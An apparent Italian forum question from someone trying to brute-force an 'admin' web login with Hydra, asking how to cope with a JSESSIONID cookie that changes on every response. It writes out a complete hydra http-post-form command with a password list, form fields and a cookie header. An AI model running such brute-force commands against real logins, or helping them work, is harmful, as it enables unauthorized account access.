Correlati: come per ottenere i cookie dal sito di aspx per usarlo con hydra
Il mio problema è simile al caso precedente, ottengo "20 password valide trovate" ma il server che sto provando a forzare la forza bruta invia l'header set-cookie: JSESSINOID = XXXXXXXXXX in ogni singola risposta, quindi il JSESSIONID per il la prossima richiesta è diversa ogni volta. C'è un modo per aggirare questo?
La mia sintassi:
hydra XX.XXX.XX.XX -l admin -P pwlist.txt http-post-form “/Path/to/page.do:method=LoginAction&formName=loginform&pageType=1&userName=^USER^&password=^PASS^:Please enter valid User name and Password.:H=Cookie: JSESSIONID=XXXXXxxxxxXXXXXX”
Grazie per il tuo aiuto.
